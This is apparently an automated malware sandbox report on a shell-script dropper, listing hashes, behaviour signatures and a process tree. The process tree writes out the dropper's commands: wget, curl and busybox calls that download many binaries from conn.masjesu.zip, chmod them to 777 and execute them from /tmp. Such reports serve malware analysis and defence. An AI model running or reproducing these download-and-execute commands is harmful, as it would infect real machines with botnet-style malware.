Analysis
-
max time kernel
80s -
max time network
79s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 01:45
Static task
static1
Behavioral task
behavioral1
Sample
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
-
Size
10KB
-
MD5
cd798da264eea2cb34f14ab849c4c0e3
-
SHA1
f8107efcd9299b6364ce3648717b2ecc577cc05a
-
SHA256
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617
-
SHA512
886db5cb7ff8566ea8507ce0cb56df8dc2dd51d8a5e7ac27a67d2a19da607232b90918a184ceb91dafc01fdecdfa552185580c40db363b5fa153849afda32cdc
-
SSDEEP
192:G3T4hJ8AQ4mPmfmympmFm8/bfTUJhdWA3T4hJFfTUJh3mPmfmympmFm8o:uAQJeO3kY8/YW9eO3kY8o
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 979 chmod 881 chmod 888 chmod 860 chmod 965 chmod 799 chmod 843 chmod 874 chmod 895 chmod 764 chmod 902 chmod 1007 chmod 825 chmod 867 chmod 909 chmod 930 chmod 944 chmod 972 chmod 986 chmod 1000 chmod 792 chmod 853 chmod 993 chmod 916 chmod 951 chmod 958 chmod 923 chmod 937 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw 765 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF 793 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB 800 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o 826 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey 844 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod 854 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG 861 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 868 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq 875 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca 882 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp 889 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n 896 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL 903 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz 910 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp 917 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n 924 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL 931 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz 938 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o 945 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw 952 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF 959 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB 966 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca 973 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey 980 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod 987 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG 994 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 1001 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq 1008 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 901 busybox 920 curl 969 curl 976 curl 798 busybox 948 curl 964 busybox 971 busybox 990 curl 1006 busybox 795 wget 871 curl 884 wget 933 wget 982 wget 997 curl 852 busybox 880 busybox 913 curl 996 wget 796 curl 802 wget 819 busybox 864 curl 885 curl 927 curl 943 busybox 978 busybox 985 busybox 717 wget 756 busybox 831 wget 877 wget 936 busybox 912 wget 859 busybox 863 wget 866 busybox 891 wget 940 wget 962 curl 730 curl 789 curl 856 wget 905 wget 873 busybox 894 busybox 908 busybox 955 curl 847 curl 919 wget 947 wget 954 wget 983 curl 846 wget 857 curl 892 curl 934 curl 941 curl 957 busybox 999 busybox 922 busybox 926 wget 950 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n curl File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz curl File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp curl File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca curl File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF curl File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB curl File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca curl File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n curl File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG curl File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 curl File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq curl File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw curl File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz curl File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw curl File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod curl File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL curl File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o curl File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey curl File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o curl File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey curl File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod curl File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 curl File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL curl File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB curl File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq curl File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF curl File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG curl File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp curl
Processes
-
/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- System Network Configuration Discovery
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- System Network Configuration Discovery
PID:756
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:768
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:770
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:791
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:794
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- System Network Configuration Discovery
PID:795
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- System Network Configuration Discovery
PID:798
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:801
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- System Network Configuration Discovery
PID:802
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:829
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- System Network Configuration Discovery
PID:831
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:842
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:845
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- System Network Configuration Discovery
PID:846
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:887
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:915
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:929
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- System Network Configuration Discovery
PID:936
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- System Network Configuration Discovery
PID:943
-
-
